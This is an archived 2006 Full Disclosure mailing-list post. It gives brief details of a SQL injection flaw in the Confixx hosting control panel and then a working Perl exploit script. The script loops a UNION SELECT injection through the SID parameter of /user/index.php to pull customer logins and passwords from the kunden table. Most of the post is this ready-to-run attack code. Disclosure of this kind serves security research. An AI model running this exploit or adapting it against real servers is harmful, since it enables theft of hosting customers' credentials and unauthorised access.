Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Confixx Index.PHP SQL Injection Vulnerability (Exploit - not new vuln)
From: defa <defa () systemli org>
Date: Wed, 19 Apr 2006 00:00:59 +0200

Here is more information on the confixx vuln released by LoK Crew. Sorry for the poor quality of this posting, I was short of time.

Product:
^^^^^^^
Confixx is a comprehensive control panel that provides the best value, proven quality, fully developed feature set and quality support. The software’s powerful features have been especially designed to meet the requirements of hosting providers.
More -> http://www.swsoft.com/en/products/confixx/

Risk: High - eventually remote root access
^^^^

Serverity: High
^^^^^^^^

Discussion:
^^^^^^^^^^^
The vuln itself can be found in the html/session.inc.php in the function sessao_read( $sKey ) which is used to overwrite the php-own session methods. The file "loginform.php" can be used to display e.g. admin hashes. Read the rest by studying the attached exploit.

Reference:
^^^^^^^^^^
Vuln was published by LoK-Crew here:
http://venom.sam-city.com/confixx2.txt

Read more:
^^^^^^^^^^^
http://www.securityfocus.com/bid/17476/


Code:
^^^^^

--------------- <snip> -------------

#!/usr/bin/perl
use IO::Socket;

if (@ARGV < 1)
{
print q(
exploit by defa (2006)
=========================
confixx_exploit.pl [URL]
params:
  [URL] - server url
);
exit;
}

$serv  = $ARGV[0];
$serv =~ s/(http:\/\/)//eg;

for ($i=0;$i<=100;$i++)
{
#$i=1;
$hit = 0;
$url = "http://";;
$url .= $serv;
$url .= "/user/index.php?SID=1'%20AND%200=1%20UNION%20SELECT%20CONCAT";
$url .= "('_error|s:',length(longpw)%2Blength(kunde)%2B8,':%22','HIT:% 20',"; $url .= "kunde,'%20:%20',longpw,'%22;')%20AS%20'sdata'%20FROM%20kunden %20LIMIT%20";
$url .= "$i,1/*";

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "localhost", PeerPort => "80") || die "[-] CONNECT FAILED\r\n";


print  $socket "GET $url HTTP/1.1\n";
print  $socket "Host: $serv\n";
print  $socket 'User-Agent: confixx_exploit'."\n";
print $socket "Connection: close\n\n";
while ($answer = <$socket>)
{
if ($answer =~ /<p>HIT:/)
        {
                # $answer =~ s/<[A-Z,a-z,=].+>//g;
                print "$answer";
                $hit = 1;
        }

}
if ($hit == 0) {die("that's it");}
}

--------------- <snap> -------------

bye
defa

--
don't eat yellow snow



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]